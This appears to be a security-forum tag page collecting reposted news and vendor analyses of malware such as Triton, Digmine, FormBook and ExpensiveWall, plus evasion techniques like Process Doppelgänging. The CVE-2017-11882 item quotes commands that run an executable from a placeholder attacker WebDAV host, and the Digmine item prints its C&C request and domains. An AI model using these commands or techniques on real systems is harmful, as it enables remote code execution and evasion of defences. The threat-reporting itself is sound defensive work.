Jump to content

Search the Community

Showing results for tags 'malware'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 66 results

  1. DeepLocker, a novel class of highly targeted and evasive attacks powered by artificial intelligence (AI). DeepLocker was developed as a proof of concept by IBM Research in order to understand how several AI and malware techniques already being seen in the wild could be combined to create a highly evasive new breed of malware, which conceals its malicious intent until it reached a specific victim. It achieves this by using a Deep Neural Network (DNN) AI-model to hide its attack payload in benign carrier applications, while the payload will only be unlocked if—and only if —the intended target is reached. DeepLocker leverages several attributes for target identification, including visual, audio, geolocation, and system-level features. In contrast to existing evasive and targeted malware, this method would make it extremely challenging to reverse engineer the benign carrier software and recover the mission-critical secrets, including the attack payload and the specifics of the target. blackhat presentation slides DeepLocker: How AI Can Power a Stealthy New Breed of Malware https://www.youtube.com/watch?v=UeMe_-5W8UY state sponsored cibercrime ?
  2. Synopsis: Process Dump is a Windows reverse-engineering command-line tool to dump malware memory components back to disk for analysis. Often malware files are packed and obfuscated before they are executed in order to avoid AV scanners, however when these files are executed they will often unpack or inject a clean version of the malware code in memory. A common task for malware researchers when analyzing malware is to dump this unpacked code back from memory to disk for scanning with AV products or for analysis with static analysis tools such as IDA. Source: http://split-code.com/processdump.html (side-note: unul dintre cele mai interesante website-uri din punc de vedere al design-ului) GitHub Repository: https://github.com/glmcdona/Process-Dump Via:
  3. Researchers have discovered new variants of Spectre and Meltdown. The software mitigations for Spectre and Meltdown seem to block these variants, although the eventual CPU fixes will have to be expanded to account for these new attacks. via Bruce Schneier gasesc interesant si articolul The Future of Computing Depends on Making It Reversible, It’s time to embrace reversible computing, which could offer dramatic improvements in energy efficiency de Michael P. Frank , cit si un dialog postat de cititori: "I don't understand why they don't just make a separate processor for security sensitive concerns — one that's slower and auditable but still powerful enough to do nice things — and give that it's own physical bank of RAM, and allow it to simply communicate with the "crazy fast but side-channel-exfiltrateable" CPU(s). You know they did all of that right? Intel ships a Pentium-class CPU, with no speculative execution, inside every CPU. AMD has something too, I've heard rumors it's ARM. Too bad they did it exactly in the wrong way. They made an unauditable, unusable, trusted component (ME/PSP) that can compromise the main CPU. We can't remove their code, we can't put our own code there... but if we could, it would be exactly what you asked for. They're even advertising it as "for security"."
  4. Symantec Hackers utilizing the Triton malware have managed to close down industrial operations in the Middle East, researchers have warned. On Thursday, cybersecurity researchers from FireEye's Mandiant revealed that threat actors deployed malware capable of manipulating emergency shutdown systems at a critical infrastructure firm in the Middle East. The new form of malware, dubbed Triton, is one of only a handful of malware families known to have been developed for the purpose of attacking industrial processes and core infrastructure we all rely upon for supplies such as gas, oil, and electricity. Stuxnet was one of the first indicators that such malware exists after the worm was used against industrial players in Iran in 2010, and in 2014, a South Korean nuclear facility was targeted. In 2016, Ukraine's capital Kiev had a power outage after malware took down a power grid. The new Trojan, which Symantec researchers say has been active since at least August this year, has been designed to communicate with a specific type of industrial control system (ICS), namely safety instrumented systems (SIS) controllers produced by Triconex. Triton is an attack framework built to tamper with such controllers by communicating with them through computers using the Microsoft Windows operating system. According to Symantec -- while it is early days into the investigation -- the malware appears to inject code which modifies the behavior of SIS devices, leading to threat actor control and potential damage. In the case of the victim company, Triton was used to target emergency shutdown capabilities. However, the security researchers believe Triton was intended for use in "causing physical damage," but the plant was shut down inadvertently during the attack instead. The malware was deployed in order to reprogram the SIS controllers but some of the devices entered a failed safe state which closed the plant down and alerted operators to the scheme. The majority of cyberattackers have money in mind when they deploy malware or infiltrate systems, whether it be to clear out customer accounts or to steal valuable corporate data. However, in this case, there was no clear financial goal -- but the groups' persistence, skill, the targeting of core infrastructure, and what appears to be resources at their disposal all points towards state sponsorship. In October, the FBI and US Department of Homeland Security (DHS) warned that energy companies are now under constant attack by threat actors seeking to steal information related to their control systems. Firms in the energy, nuclear, water, aviation, and critical manufacturing sectors are at risk, according to the agencies, from hackers which target small firms as stepping stones towards more valuable companies. Via zdnet.com
  5. We found a new cryptocurrency-mining bot spreading through Facebook Messenger, which we first observed in South Korea. We named this Digmine based on the moniker (비트코인 채굴기 bot) it was referred to in a report of recent related incidents in South Korea. We’ve also seen Digmine spreading in other regions such as Vietnam, Azerbaijan, Ukraine, Vietnam, Philippines, Thailand, and Venezuela. It’s not far-off for Digmine to reach other countries given the way it propagates. Facebook Messenger works across different platforms, but Digmine only affects Facebook Messenger’s desktop/web browser (Chrome) version. If the file is opened on other platforms (e.g., mobile), the malware will not work as intended. Digmine is coded in AutoIt, and sent to would-be victims posing as a video file but is actually an AutoIt executable script. If the user’s Facebook account is set to log in automatically, Digmine will manipulate Facebook Messenger in order to send a link to the file to the account’s friends. The abuse of Facebook is limited to propagation for now, but it wouldn’t be implausible for attackers to hijack the Facebook account itself down the line. This functionality’s code is pushed from the command-and-control (C&C) server, which means it can be updated. A known modus operandi of cryptocurrency-mining botnets, and particularly for Digmine (which mines Monero), is to stay in the victim’s system for as long as possible. It also wants to infect as many machines as possible, as this translates to an increased hashrate and potentially more cybercriminal income. Figure 1: Digmine’s attack chain Figure 2: Link to Digmine sent via Facebook Messenger (top, cropped) and the file pretending to be a video (bottom); original image source: c0nstant (bottom right) Infection Chain Digmine is a downloader that will first connect to the C&C server to read its configuration and download multiple components. The initial configuration contains links where it downloads components, most of which are also hosted on the same C&C server. It saves the downloaded components in the %appdata%\<username> directory. Figure 3: Configuration for the downloader (top); and the downloaded components (bottom) Digmine will also perform other routines such as installing a registry autostart mechanism as well as system infection marker. It will search and launch Chrome then load a malicious browser extension that it retrieves from the C&C server. If Chrome is already running, the malware will terminate and relaunch Chrome to ensure the extension is loaded. While extensions can only be loaded and hosted from the Chrome Web Store, the attackers bypassed this by launching Chrome (loaded with the malicious extension) via command line. Figure 4: Digmine downloader component in the autostart registry entry (top), and a marker indicating the malware has infected the system (bottom) Figure 5: Currently running Chrome process terminated (top) and relaunching Chrome with parameter to load extension (bottom) The extension will read its own configuration from the C&C server. It can instruct the extension to either proceed with logging in to Facebook or open a fake page that will play a video. The decoy website that plays the video also serves as part of their C&C structure. This site pretends to be a video streaming site but also holds a lot of the configurations for the malware’s components. Figure 6: Configuration link for the decoy video if a separate routine is set by the configuration from the C&C (top), and screenshot of a fake streaming site used to play video as decoy (bottom) Figure 7: Initial configuration used by the browser extension Propagation The browser extension is responsible for propagation via interaction with Chrome, and by extension, Facebook Messenger. This routine is triggered by conditions available in the configuration file retrieved from the C&C server. If the user has their Facebook account automatically logged in by default, the browser extension is able to interact with their account. It does so by downloading additional code from the C&C server. Digmine’s interaction with Facebook could get more functions in the future since it’s possible to add more code. Figure 8: Part of additional codes retrieved from C&C server, which allows interaction with Facebook Mining Component The miner module will be downloaded by codec.exe, which is the miner management component. It will connect to another C&C server to retrieve the miner and its corresponding configuration file. The mining component miner.exe is an iteration of an open-source Monero miner known as XMRig. The miner was reconfigured to execute using the config.json file instead of receiving parameters directly from the command line. Figure 9: Miner configuration (top) and codec.exe code launching the miner component with config (bottom) C&C Communication and Protocol Both the downloader and mining management component use specific HTTP headers to communicate with the C&C server. When downloading the initial configuration, the malware constructs the HTTP GET request before sending to the C&C server: GET /api/apple/config.php HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Miner Window: <Window name of active window> ScriptName: <filename of malware> OS: <OS version> Host: <C&C> Of note is how the malware uses a specific User-Agent called Miner. It denies access to the initial configuration file if the HTTP header request is incorrect. Best Practices The increasing popularity of cryptocurrency mining is drawing attackers back to the mining botnet business. And like many cybercriminal schemes, numbers are crucial—bigger victim pools equate to potentially bigger profits. The fact that they’re piggybacking on popular platforms such as social media to spread their malware is unsurprising. To avoid these types of threats, follow best practices on securing social media accounts: think before you share, be aware of suspicious and unsolicited messages, and enable your account’s privacy settings. We disclosed our findings to Facebook, which promptly removed many of the Digmine-related links from its platform. In Facebook’s official statement, “We maintain a number of automated systems to help stop harmful links and files from appearing on Facebook and in Messenger. If we suspect your computer is infected with malware, we will provide you with a free anti-virus scan from our trusted partners. We share tips on how to stay secure and links to these scanners on facebook.com/help.” Indicators of Compromise (IoCs): Hash detected as TROJ_DIGMINEIN.A (SHA256); beb7274d78c63aa44515fe6bbfd324f49ec2cc0b8650aeb2d6c8ab61a0ae9f1d Hash detected as BREX_DIGMINEEX.A (SHA256): 5a5b8551a82c57b683f9bd8ba49aefeab3d7c9d299a2d2cb446816cd15d3b3e9 Hash detected as TROJ_DIGMINE.A (SHA256): f7e0398ae1f5a2f48055cf712b08972a1b6eb14579333bf038d37ed862c55909 C&C servers related to Digmine (including subdomains): vijus[.]bid ozivu[.]bid thisdayfunnyday[.]space thisaworkstation[.]space mybigthink[.]space mokuz[.]bid pabus[.]bid yezav[.]bid bigih[.]bid taraz[.]bid megu[.]info Source: http://blog.trendmicro.com/trendlabs-security-intelligence/digmine-cryptocurrency-miner-spreading-via-facebook-messenger/
  6. A team of security researchers has discovered a new malware evasion technique that could help malware authors defeat most of the modern antivirus solutions and forensic tools. Dubbed Process Doppelgänging, the new fileless code injection technique takes advantage of a built-in Windows function and an undocumented implementation of Windows process loader. Ensilo security researchers Tal Liberman and Eugene Kogan, who discovered the Process Doppelgänging attack, presented their findings today at Black Hat 2017 Security conference held in London. Process Doppelgänging Works on All Windows Versions Apparently, Process Doppelgänging attack works on all modern versions of Microsoft Windows operating system, starting from Windows Vista to the latest version of Windows 10. Tal Liberman, the head of the research team at enSilo, told The Hacker New that this malware evasion technique is similar to Process Hollowing—a method first introduced years ago by attackers to defeat the mitigation capabilities of security products. In Process Hollowing attack, hackers replace the memory of a legitimate process with a malicious code so that the second code runs instead of the original, tricking process monitoring tools and antivirus into believing that the original process is running. Since all modern antivirus and security products have been upgraded to detect Process Hollowing attacks, use of this technique is not a great idea anymore. On the other hand, Process Doppelgänging is an entirely different approach to achieve the same, by abusing Windows NTFS Transactions and an outdated implementation of Windows process loader, which was originally designed for Windows XP, but carried throughout all later versions of Windows. Here's How the Process Doppelgänging Attack Works: Before going further on how this new code injection attack works, you need to understand what Windows NTFS Transaction is and how an attacker could leverage it to evade his malicious actions. NTFS Transaction is a feature of Windows that brings the concept of atomic transactions to the NTFS file system, allowing files and directories to be created, modified, renamed, and deleted atomically. NTFS Transaction is an isolated space that allows Windows application developers to write file-output routines that are guaranteed to either succeed completely or fail completely. According to the researcher, Process Doppelgänging is a fileless attack and works in four major steps as mentioned below: Transact—process a legitimate executable into the NTFS transaction and then overwrite it with a malicious file. Load—create a memory section from the modified (malicious) file. Rollback—rollback the transaction (deliberately failing the transaction), resulting in the removal of all the changes in the legitimate executable in a way they never existed. Animate—bring the doppelganger to life. Use the older implementation of Windows process loader to create a process with the previously created memory section (in step 2), which is actually malicious and never saved to disk, "making it invisible to most recording tools such as modern EDRs." Process Doppelgänging Evades Detection from Most Antiviruses Liberman told The Hacker News that during their research they tested their attack on security products from Windows Defender, Kaspersky Labs, ESET NOD32, Symantec, Trend Micro, Avast, McAfee, AVG, Panda, and even advance forensic tools. In order to demonstrate, the researchers used Mimikatz, a post-exploitation tool that helps extract credentials from the affected systems, with Process Doppelgänging to bypass antivirus detection. When the researchers ran Mimikatz generally on a Windows operating system, Symantec antivirus solution caught the tool immediately, as shown below: However, Mimikatz ran stealthy, without antivirus displaying any warning when executed using Process Doppelgänging, as shown in the image at top of this article. Liberman also told us that Process Doppelgänging works on even the latest version of Windows 10, except Windows 10 Redstone and Fall Creators Update, released earlier this year. But due to a different bug in Windows 10 Redstone and Fall Creators Update, using Process Doppelgänging causes BSOD (blue screen of death), which crashes users' computers. Ironically, the crash bug was patched by Microsoft in later updates, allowing Process Doppelgänging to run on the latest versions of Windows 10. I don't expect Microsoft to rush for an emergency patch that could make some software relying on older implementations unstable, but Antivirus companies can upgrade their products to detect malicious programs using Process Doppelgänging or similar attacks. This is not the very first time when enSilo researchers have discovered a malware evasion technique. Previously they discovered and demonstrated AtomBombing technique which also abused a designing weakness in Windows OS. In September, enSilo researchers also disclosed a 17-year-old programming error in Microsoft Windows kernel that prevented security software from detecting malware at runtime when loaded into system memory. Via thehackernews.com
  7. You should be extra careful when opening files in MS Office. When the world is still dealing with the threat of 'unpatched' Microsoft Office's built-in DDE feature, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers. The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update. Discovered by the security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document. The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents. However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user. Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and had been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions. DEMO: Exploitation Allows Full System Take Over Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software. This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847). Possible Attack Scenario: While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below: "By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)." "One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker." "Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient." "After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service." Protection Against Microsoft Office Vulnerability With this month's Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory. So, users are strongly recommended to apply November security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers. Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system security. Users can run the following command in the command prompt to disable registering of the component in Windows registry: reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 For 32-bit Microsoft Office package in x64 OS, run the following command: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 Besides this, users should also enable Protected View (Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro). Via thehackernews.com
  8. Synopsis: Noriben is a Python-based script that works in conjunction with SysInternals Procmon to automatically collect, analyze, and report on run-time indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities. Link: https://github.com/Rurik/noriben
  9. Disassembler and Runtime Analysis (or how IDA Pro has some difficulties when displaying correctly the assembly of the patched run-time whilst using a Graph view) Link: http://blog.talosintelligence.com/2017/10/disassembler-and-runtime-analysis.html
  10. https://riscybusiness.wordpress.com/2017/10/07/hiding-your-process-from-sysinternals/
  11. It seems sophisticated hackers have changed the way they conduct targeted cyber operations—instead of investing in zero-days and developing their malware; some hacking groups have now started using ready-made malware just like script kiddies. Possibly, this could be a smart move for state-sponsored hackers to avoid being attributed easily. Security researchers from multiple security firms, including Arbor Networks and FireEye, independently discovered a series of malware campaigns primarily targeting aerospace, defence contractors and manufacturing sectors in various countries, including the United States, Thailand, South Korea and India. What's common? All these attack campaigns, conducted by various hacking groups, eventually install same information and password stealer malware—dubbed FormBook—on the targeted systems. FormBook is nothing but a "malware-as-as-service," which is an affordable piece of data-stealing and form-grabbing malware that has been advertised in various hacking forums since early 2016. Anyone can rent FormBook for just $29 per week or $59 per month, which offers a range of advanced spying capabilities on target machines, including a keylogger, password stealer, network sniffer, taking the screenshots, web form data stealer and more. According to the researchers, attackers in each campaign are primarily using emails to distribute the FormBook malware as an attachment in different forms, including PDFs with malicious download links, DOC and XLS files with malicious macros, and archive files (ZIP, RAR, ACE, and ISOs) containing EXE payloads. Once installed on a target system, the malware injects itself into various processes and starts capturing keystrokes and extracts stored passwords and other sensitive data from multiple applications, including Google Chrome, Firefox, Skype, Safari, Vivaldi, Q-360, Microsoft Outlook, Mozilla Thunderbird, 3D-FTP, FileZilla and WinSCP. FormBook continuously sends all the stolen data to a remote command and control (C2) server which also allows the attacker to execute other commands on the targeted system, including start processes, shutdown and reboot the system, and stealing cookies. According to the researchers, FormBook was also seen downloading other malware families such as NanoCore in the last few weeks. The attackers can even use the data successfully harvested by FormBook for further cybercriminal activities including, identity theft, continued phishing operations, bank fraud and extortion. FormBook is neither sophisticated, nor difficult-to-detect malware, so the best way to protect yourself from this malware is to keep good antivirus software on your systems, and always keep it up-to-date. Via thehackernews.com
  12. Check Point’s mobile threat research team identified a new variant of an Android malware that sends fraudulent premium SMS messages and charges users’ accounts for fake services without their knowledge. According to Google Play data, the malware infected at least 50 apps and was downloaded between 1 million and 4.2 million times before the affected apps were removed. The new strain of malware is dubbed “ExpensiveWall,” after one of the apps it uses to infect devices, “Lovely Wallpaper.” ExpensiveWall is a new variant of a malware found earlier this year on Google Play. The entire malware family has now been downloaded between 5.9 million and 21.1 million times. What makes ExpensiveWall different than its other family members is that it is ‘packed’ – an advanced obfuscation technique used by malware developers to encrypt malicious code – allowing it to evade Google Play’s built-in anti-malware protections. Learn how SandBlast Mobile protects against malware like ExpensiveWall. Check Point notified Google about ExpensiveWall on August 7, 2017, and Google promptly removed the reported samples from its store. However, even after the affected Apps were removed, within days another sample infiltrated Google Play, infecting more than 5,000 devices before it was removed four days later. Figure 1: One of the malicious apps containing ExpensiveWall. It’s important to point out that any infected app installed before it was removed from the App store, still remains installed on users’ devices. Users who downloaded these apps are therefore still at risk and should manually remove them from their devices. What does ExpensiveWall do? The malware registers victims to premium services without their knowledge and sends fraudulent premium SMS messages, charging their accounts for fake services. Why is ExpensiveWall dangerous? While ExpensiveWall is currently designed only to generate profit from its victims, a similar malware could be easily modified to use the same infrastructure in order to capture pictures, record audio, and even steal sensitive data and send the data to a command and control (C&C) server. Since the malware is capable of operating silently, all of this illicit activity takes place without the victim’s knowledge, turning it into the ultimate spying tool. How does ExpensiveWall work? Once ExpensiveWall is downloaded, it requests several common permissions, including internet access – which allows the app to connect to its C&C server – and SMS permissions – which enable it to send premium SMS messages and register users for other paid services all without the users knowledge. While these permissions are harmful within the context of a malware, many apps request the same permissions for legitimate purposes. Most users grant these permissions without thinking, especially when installing an app from a trustworthy source such as Google Play. ExpensiveWall contains an interface that connects between in-app actions and the JavaScript code, which runs on a web interface called WebView, meaning JavaScript running inside the WebView can trigger in-app activities. After it is installed and granted the necessary permissions, ExpensiveWall sends data about the infected device to its C&C server, including its location and unique identifiers, such as MAC and IP addresses, IMSI, and IMEI. Figure 2: Clicking functionality used by the ExpensiveWall malware. Each time the device is switched on, or experiences a connectivity change, the app connects to its C&C server and receives a URL, which it opens in an embedded WebView. This page contains a malicious JavaScript code that can invoke in-app functions using JavascriptInterface, like subscribing them to premium services and sending SMS messages. The malware initiates the JavaScript code by silently clicking on the links in the webpage, in the same way it clicks on ads in other occasions. Subscribing victims to paid services The malware obtains the device’s phone number and uses it to subscribe the user to different paid services, such as the example below: Figure 3: Code used to obtain phone number. Figure 4: A premium service the malware subscribes the user to. Sending premium SMS messages In some cases, the SMS activity takes place without giving the user any notice. In other cases, the malware presents the user with a button called “Continue,” and once the user clicks the button, the malware sends a premium SMS on his behalf. Below is an example of the HTML code containing the embedded JavaScript: Figure 5: embedded JavaScript responsible for sending SMS messages. ExpensiveWall on Google Play The malicious activities did not go unnoticed by the users, as one notes below: Figure 6: User’s comments on an ExpensiveWall app. As seen in the image above, many users suspected that ExpensiveWall was a malicious app. The comments indicate that the app is promoted on several social networks including Instagram, which might explain how it came to be downloaded so many times. See Check Point Research for the complete technical report. After analyzing different samples of the malware, Check Point mobile threat researchers believe ExpensiveWall is spread to different apps as an SDK called “gtk,” which developers embed in their own apps. Three versions of apps containing the malicious code exist. The first is the unpacked version, which was discovered earlier this year. The second is the packed version, which is being discussed here, and the third contains the code but does not actively use it. Users and organizations should be aware that any malware attack is a severe breach of their mobile network, even if it starts out as a seemingly harmless adware. ExpensiveWall is yet another example of the immediate need to protect all mobile devices against advanced threats. How to stay protected Cutting-edge malware such as ExpensiveWall requires advanced protections, capable of identifying and blocking zero-day malware by using both static and dynamic app analysis. Only by examining the malware within context of its operation on a device can successful strategies to block it be created. Users and enterprises should treat their mobile devices just like any other part of their network, and protect them with the best cybersecurity solutions available. Check Point customers are protected by SandBlast Mobile, and on the network front by Check Point Anti-Bot Blade, which provides protection against this threat with the signature: Trojan.AndroidOS.ExpensiveWall. Appendix 1: List of Package names and downloads: Package Name App Name min max Uploaded to Google Play com.star.trek I Love Fliter 1,000,000 5,000,000 18/09/2016 com.newac.toolbox Tool Box Pro 500,000 1,000,000 19/10/2015 com.newac.wallpaper X WALLPAPER 500,000 1,000,000 27/09/2015 com.yeahmobi.horoscopeinter Horoscope 500,000 1,000,000 16/03/2015 com.gkt.xwallpaper X Wallpaper Pro 500,000 1,000,000 02/06/2015 com.gwqcv.zsfy Beautiful Camera 100,000 500,000 11/05/2017 com.hdsj.hdey Color Camera 100,000 500,000 16/03/2017 com.lovephoto.gp.inter Love Photo 100,000 500,000 13/03/2017 com.parrot.tidecmr Tide Camera 100,000 500,000 22/03/2017 com.zerg.charmingcmr Charming Camera 100,000 500,000 22/03/2017 com.constellation.prophecy Horoscope 100,000 500,000 30/06/2016 com.desktoptools.screenunsubscribe DIY Your Screen 100,000 500,000 21/07/2016 com.gkt.ringtonegp Ringtone 100,000 500,000 02/06/2015 com.gpthtwo.horoscope ดวง 12 ราศี Lite 100,000 500,000 03/11/2015 com.guard.defend Safe locker 100,000 500,000 17/06/2016 com.newac.wifibooster Wifi Booster 100,000 500,000 04/11/2015 com.newera.desktop Cool Desktop 100,000 500,000 30/06/2016 com.newera.toolbox useful cube 100,000 500,000 12/06/2016 com.pl.toolboxpro Tool Box Pro 100,000 500,000 22/01/2016 com.something.someone Useful Desktop 100,000 500,000 17/09/2016 com.yeahmobi.horoscope ดวง 12 ราศี Lite 100,000 500,000 20/28/2014 com.yeahmobi.horoscopegpadap Horoscope2.0 100,000 500,000 23/03/2015 com.cegqz.uoud Yes Star 50,000 100,000 03/05/2017 com.cmr.shiny Shiny Camera 50,000 100,000 03/05/2017 com.johg.udrad Simple Camera 50,000 100,000 07/07/2017 com.scamera.smiling Smiling Camera 50,000 100,000 07/06/2017 com.cmr.universal Universal Camera 50,000 100,000 16/05/2017 com.gb.toolbox Amazing Toolbox 50,000 100,000 23/03/2016 com.genesis.awesome Easy capture 50,000 100,000 24/10/2016 com.newera.memorydoctor Memory Doctor 50,000 100,000 15/06/2016 com.pl.toolbox Tool Box Pro 50,000 100,000 08/12/2015 com.sexy.pic Reborn Beauty 50,000 100,000 28/07/2016 com.joy.photo.gp.inter Joy Photo 50,000 100,000 02/08/2016 com.fancy.camera.gp.inter Fancy Camera 50,000 100,000 09/08/2016 com.amazing.photo.gp.inter Amazing Photo 50,000 100,000 13/09/2016 com.amazing.camera.ggi Amazing Camera 50,000 100,000 05/01/2017 com.super.wallpaper.gp.inter Super Wallpaper 50,000 100,000 30/08/2016 com.aolw.maoa DD Player 10,000 50,000 13/03/2017 com.bbapcmr.fascinating Fascinating Camera 10,000 50,000 13/04/2017 com.coral.muse Universal Camera 10,000 50,000 13/07/2017 com.cream.lecoa Cream Camera 10,000 50,000 27/03/2017 com.dmeq.oopes Looking Camera 10,000 50,000 23/05/2017 com.dosl.wthre DD Weather 10,000 50,000 23/05/2017 com.fqaf.dlksk Global Weather 10,000 50,000 03/05/2017 com.ivxz.ykvlf Love Fitness 10,000 50,000 23/05/2017 com.jpst.lsyk Pretty Pictures 10,000 50,000 06/04/2017 com.kifb.mifv Cool Wallpapers 10,000 50,000 10/01/2017 com.magic.beautycmr Beauty Camera 10,000 50,000 04/04/2017 com.opaly.nqib Love locker 10,000 50,000 12/05/2017 com.real.stargh Real Star 10,000 50,000 27/02/2017 com.sadcmr.magic Magic Camera 10,000 50,000 14/06/2017 com.scamera.wonder Wonder Camera 10,000 50,000 14/06/2017 com.scmr.funny Funny Camera 10,000 50,000 02/06/2017 com.simon.easy Easy Camera 10,000 50,000 28/02/2017 com.smgft.keyboard Smart Keyboard 10,000 50,000 14/06/2017 com.xnoc.jdvy Travel Camera 10,000 50,000 02/05/2017 com.yiuw.fhly Photo Warp 10,000 50,000 20/01/2017 com.yjmn.vokle Lovely Wallpaper 10,000 50,000 07/07/2017 com.ysyg.wtmca Lattice Camera 10,000 50,000 09/06/2017 fast.bats.chaz Quick Charger 10,000 50,000 08/05/2017 com.upcamera.xgcby Up Camera 10,000 50,000 18/01/2017 com.photo.power.gp Photo Power 10,000 50,000 23/11/2016 com.asdf.fg.hdwallpaper HDwallpaper 10,000 50,000 13/12/2016 com.gb.wonderfulgames Wonderful Games 10,000 50,000 09/04/2016 com.gkt.fileexplorer BI File Manager 10,000 50,000 01/08/2016 com.gkt.wallpapershd Wallpapers HD 10,000 50,000 03/01/2016 com.kevin.beautyvideo Beautiful Video-Edit your Memory 10,000 50,000 22/09/2016 com.newera.beautifulphoto Wonderful Cam 10,000 50,000 12/06/2016 com.next.toolset useful cube 10,000 50,000 30/06/2016 com.ringtone.freshac Ringtone 10,000 50,000 26/11/2015 com.gkt.gamebar Exciting Games 10,000 50,000 15/09/2015 com.replica.adventure.gp Replica Adventure 10,000 50,000 07/07/2016 com.gg.player.gp GG Player 10,000 50,000 12/07/2016 com.love.camera.gp Love Camera 10,000 50,000 20/10/2016 com.oneshot.beautify.gp Oneshot Beautify 10,000 50,000 01/08/2016 com.pretty.camera.gp Pretty Camera 10,000 50,000 18/10/2016 com.hygk.hlhy CuteCamera 5,000 10,000 22/02/2017 com.kkcamera.akbcartoon Cartoon Camera-stylish, clean 5,000 10,000 08/03/2017 com.craft.decorate Art Camera 5,000 7,000 13/08/2017 com.amazing.video.gp Amazing Video 5,000 10,000 16/11/2016 com.fine.photo.gp Fine Photo 5,000 10,000 22/12/2016 com.applocker.coldwar Infinity safe 5,000 10,000 09/09/2016 com.final.horosope Magical Horoscope 5,000 10,000 21/02/2017 com.gp.toolboxche Toolbox 5,000 10,000 28/04/2016 com.prettygirl.newyear Cute Belle 5,000 10,000 12/01/2017 com.roy.cartoonwallpaper CartoonWallpaper 5,000 10,000 06/09/2016 com.thebell.newcentury Ringtone 5,000 10,000 01/08/2016 com.aypx.ygzp Best Camera 1,000 5,000 16/02/2017 com.colorful.locker Colorful Locker 1,000 5,000 09/05/2017 com.hlux.wfsha Light Keyboard 1,000 5,000 21/07/2017 com.ytkue.oprw Safe Privacy 1,000 5,000 07/06/2017 com.qwer.enjoy.enjoywallpaper Enjoy Wallpaper 1,000 5,000 03/11/2016 com.file.manager.gp File Manager 1,000 5,000 13/12/2016 com.highfirst.fancylocker Fancy locker 1,000 5,000 05/01/2017 com.cute.puzzle.gp Cute Puzzle 1,000 5,000 05/10/2016 com.keyboard.smile Smile Keyboard 500 707 16/05/2017 com.owexs.iouert Vitality Camera 100 500 04/07/2017 com.tools.yidian Lock Now 100 500 23/01/2017 com.camera.kfcfancy Fancy Camera 100 500 20/03/2017 com.hhcamera.useful Useful Camera 100 224 06/03/2017 com.owexs.iouert Vitality Camera 100 224 04/07/2017 com.sec.transfer Sec Transfer 100 136 14/03/2017 com.tools.yidian Lock Now 100 500 23/01/2017 com.bpmiddle.oneversion Magic Filter 100 224 21/09/2016 com.funny.video.gp Funny Video 100 500 07/10/2016 com.ads.wowgames Amazing Gamebox 100 224 22/05/2016 com.wtns.superlocker Super locker 10 50 25/04/2017 com.musicg.ckiqp Music Player 1 2 06/04/2017 Total 5,904,511 21,101,567 Source: https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/
